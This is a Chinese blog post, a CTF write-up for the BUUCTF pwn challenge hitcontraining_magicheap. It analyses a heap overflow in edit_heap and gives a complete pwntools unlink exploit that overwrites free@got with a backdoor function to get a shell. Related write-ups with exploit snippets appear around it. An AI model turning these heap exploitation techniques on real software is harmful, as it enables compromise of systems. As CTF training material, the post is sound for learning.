hitcontraining_magicheap

最新推荐文章于 2024-05-21 20:18:03 发布
最新推荐文章于 2024-05-21 20:18:03 发布
阅读量312 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: pwn 信息安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/122075153
版权

hitcontraining_magicheap

使用checksec查看:
在这里插入图片描述
一道堆题,关闭了PIE,可以考虑覆盖got表来获取system getshell

拉进IDA中查看:

标准的菜单,main()函数就不贴截图了,menu()函数也没有营养,图也不贴了,

先来看看create_heap():
在这里插入图片描述

  • heaparray[i]:存放 chunk 的地址。
  • read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。
  • heaparray是存放在bss段上的

edit_heap():
在这里插入图片描述
read_input(heaparray[v1], v2);

  • read_input(heaparray[v1], v2):向 chunk 中写入 v2 大小的内容,也就是说如果 v2 比 create 时的 size 大的话就会造成堆溢出。

delete_heap()
在这里插入图片描述

  • free(heaparray[v1]); free 掉对应 chunk
  • heaparray[v1] = 0LL; 将指针置 0 。

还有个后门函数l33t():
在这里插入图片描述
和之前的一道题目[ZJCTF 2019]EasyHeap一样,简单些,直接有个后门函数。

可以用之前的exp修改下heaparray[]地址直接打,也可以用l33t()覆盖free@got来打,省去输入/bin/sh的步骤。

from pwn import *

#start
r = remote("node4.buuoj.cn",25748)
elf = ELF("../buu/hitcontraining_magicheap")
# r = process("../buu/hitcontraining_magicheap")

def create(sz,content):
    r.sendlineafter("choice :","1")
    r.sendlineafter("Heap : ",str(sz))
    r.sendlineafter("heap:",content)

def edit(idx,sz,content):
    r.sendlineafter("choice :","2")
    r.sendlineafter("Index :",str(idx))
    r.sendlineafter("Heap : ",str(sz))
    r.sendlineafter("heap : ",content)

def delete(idx):
    r.sendlineafter("choice :","3")
    r.sendlineafter("Index :",str(idx))


#params
heaparray_addr = 0x6020C0
getshell_addr = elf.symbols['l33t']
free_got = elf.got['free']

#attack
create(0x90,b"MMMM")#0
create(0x90,b"MMMM")#1
create(0x20,b"MMMM")#2


fake_chunk = p64(0)+p64(0x91) + p64(heaparray_addr-0x18) + p64(heaparray_addr-0x10)
fake_chunk = fake_chunk.ljust(0x90,b'M')
fake_chunk += p64(0x90) + p64(0xa0)

edit(0,0x100,fake_chunk)
delete(1)

# gdb.attach(sh,"b* 0x400930")

payload = p64(0)*3 +p64(free_got)
edit(0,0x20 ,payload)
edit(0,8,p64(getshell_addr))
delete(0)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hitcontraining magicheap
pondzhang的专栏
06-16 352
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
2021-01-25
WangLal的博客
01-25 477
学习记录 PWN的题目的一些基本步骤 我通过做些PWN的基础题目和看到大佬的WP,而学习到了一些基本步骤,分别是checksec(查看文件属性),file(查看文件类型),和执行文件。 1.checksecchecksec的介绍:https://bbs.pediy.com/thread-250538.htm) 先下载好附件,后将文件拷贝到Ubuntu虚拟机(我用的是kali),在文件处打开终端,进行检验checksec 文件名 如图所示,它是一个 64 位程序,开了 NX 防护。(如果文件名过于长建议重命
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 328
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
【unstored bin attack】hitcontraining_magicheap
huzai9527的博客
04-14 130
【unstored bin attack】 1.ida分析 2.思路 经典的unstored bin attack,修改unstored bin 中的bk为magic-0x10 即可将magic改为一个较大的数 3.exp from pwn import * p = remote('node3.buuoj.cn',25879) #p = process('./magicheap') context.log_level = 'debug' def add(size,cont): p.sendlin
hitcontraining_magicheap buuctf
m0_57754423的博客
02-12 1222
这题的漏洞点在编辑heap: 可以自定义编辑chunk内容的大小,存在堆溢出漏洞,这道题目打法也有很多。 我自己的思路是: 利用unlink实现任意地址写的效果,修改puts函数got表为l33t,然后getshell。 exp: from pwn import * p = remote("node4.buuoj.cn",25162) #p = process("./magicheap") e = ELF("./magicheap") sh_addr = 0x400c50 bss_addr
BUUCTF【hitcontraining_magicheap
weixin_51055545的博客
02-13 1646
BUUCTF【hitcontraining_magicheap】刷题 例行检查: 程序为64位,除了pie,其他保护机制都开了。放到IDA中分析 漏洞分析: 首先看到一个菜单, 发现程序是没有输出功能的,这里我们想到了去打stdout结构体来leak出地址, 这里是有一个后门的,我设置了满足的条件发现没出flag,应该比赛的环境下flag路径是对的,但buuctf路径是不对的,所以我们就去get shell拿flag。 漏洞点在edit()函数中, creat_heap()函数获取我们的大小后,在ed
[BUUCTF]PWN——hitcontraining_magicheap
mcmuyanga的博客
01-07 1060
hitcontraining_magicheap 附件 步骤: 例行检查,64位程序,开启了nx和canary 本地试运行一下,经典的堆的菜单 64位ida载入,检索程序里的字符串的时候发现了后门 main() 可以看到,当v5=4=4869,而且magic在bss段,只要覆写magic>0x1305就能够获取到shell create_heap() edit_heap() delete_heap() 利用思路:首先通过 unsorted bin attack 覆盖 magic>
hitcontraining_heapcreator
m0sway的博客
01-07 2846
hitcontraining_heapcreator 使用checksec查看: 开启了Canary和栈不可执行,没有开启PIE。 先运行一下看看: 看到菜单,堆题,放进IDA中查看: 分布来查看,首先是create_heap(): heaparray[i] = malloc(0x10uLL):创建用户所需chunk前程序会先创建一个0x10大小的chunk v0[1] = malloc(size);:程序所创建的chunk中存放了用户所创的chunk的地址 edit_heap(): rea
HITCON-Training lab13 heapcreator(heap extend)
像初雪一样自由洒落
04-16 952
啊啊啊,搞了一早上,终于终于搞明白了,,, 题目链接:https://buuoj.cn/challenges#hitcontraining_heapcreator ida简单看一下 创建堆 编辑 对比建堆,可以看到size大了一个 打印 删除 程序基本功能就这样了 因为edit的时候可以多写入一个字节,存在off-by-one,我们可...
buuctf pwn(wustctf2020_closed)(hitcontraining_magicheap)(axb_2019_fmt32)
cainiao78777的博客
04-29 227
程序有alarm闹钟函数,并且有明显的格式化字符串漏洞,而且能无限利用格式化字符串漏洞,本来想用我之前的那种解法直接解决的,但是遇到了些问题(下面说),而且这个题目got表可写,所以还是老老实实打got表吧。2.编辑堆块,根据bss段里的指针,来找到相应的堆块,然后输入大小,再填充内容,并未检测原本输入堆块内容的大小,那么此处存在堆溢出。再通过读入,覆盖dest的指针为free的got表地址,然后strcpy将free的got表地址的地址覆盖为shllcode的地址。
HITCON Training lab14——magic heap
04-19 413
64位程序,没开PIE  #Unsorted Bin Attack 先回顾一下 Unsorted Bin 的基本来源以及基本使用情况。 基本来源 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8232
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
[图解]SysML和EA建模住宅安全系统-05
rolt的专栏
05-18 654
作用就是定义属性之间的数学关系
Nginx - 安全基线配置与操作指南
小工匠
05-19 919
我们这里主要介绍针对Nginx中间件的安全基线配置指南,包括版本选择、用户创建、权限设置、缓冲区配置、日志管理、访问限制、错误页面处理、并发控制、补丁更新等方面。同时还涵盖了如何配置正向代理模块、防止目录遍历以及服务监控等内容,旨在指导系统管理员确保中间件服务器的安全性本文档规定了中间件服务器应当遵循的安全性设置标准,旨在指导系统管理人员或安全检查人员进行中间件的安全合规性检查和配置。
[图解]SysML和EA建模住宅安全系统-07 to be块定义图
rolt的专栏
05-21 666
然后再针对这个画一个块内部图,然后这里再把签名拖上去
HLS视频加密,让您的视频内容更安全
云存储小天使的博客
05-21 425
HLS视频加密是一种基于HTTP Live Streaming(HLS)协议的加密技术。它的核心思想是将视频切片进行加密处理,在客户端播放时需要先获取解密密钥才能正常偶发。通过这种方式,HLS加密可以有效防止未经授权的第三方窃取视频内容,从而保障了视频内容的版权和安全。数据万象媒体处理服务提供了一套HLS视频加密方案,方便用户各个场景的需求。
如何选择一款安全高效的数据自动同步工具?
文件数据安全交换
05-21 173
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。由于大部分的数据都是需要实时的同步到其他节点进行使用和分析的,原有的数据传输方式没有任何的消息通知,也没有日志记录可查询,需要靠人工去各个节点确认,费时费力,效率低下;提供完善的数据同步日志和用户操作日志,便于查询和审计,快速排查错误或遗漏。
深度学习之基于YoloV5的建筑场所安全检测系统
2301_79810943的博客
05-21 252
一、项目背景与目标随着城市化进程的加速,建筑场所的安全问题日益受到关注。为了实现对建筑场所的全面、实时监控,并及时发现潜在的安全隐患,本项目旨在利用深度学习技术,开发一个基于YoloV5算法的建筑场所安全检测系统。二、技术选型与特点YoloV5算法:本项目采用YoloV5作为核心检测算法。YoloV5以其高精度、快速检测速度和强大的多尺度检测能力著称,非常适合用于复杂建筑场所的安全检测。
检测高空作业人员安全绳是否佩戴系统
最新发布
燧机科技的博客
05-21 179
检测高空作业人员安全绳是否佩戴系统基于AI视觉智能分析算法,检测高空作业人员安全绳是否佩戴系统通过现场摄像头对高处作业区域内的人员进行自动检测识别。系统能够快速、准确地检测高空作业人员是否佩戴安全绳。一旦系统检测到人员未佩戴安全绳,会立即进行告警,并将告警信息推送给相关管理者。检测高空作业人员安全绳是否佩戴系统通过实时检测和告警,系统可以及时发现安全隐患,并采取相应措施防范事故的发生。该系统采用视频图像自动识别的形式,不需要新增硬件,实时监控识别,实时告警,简单方便。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值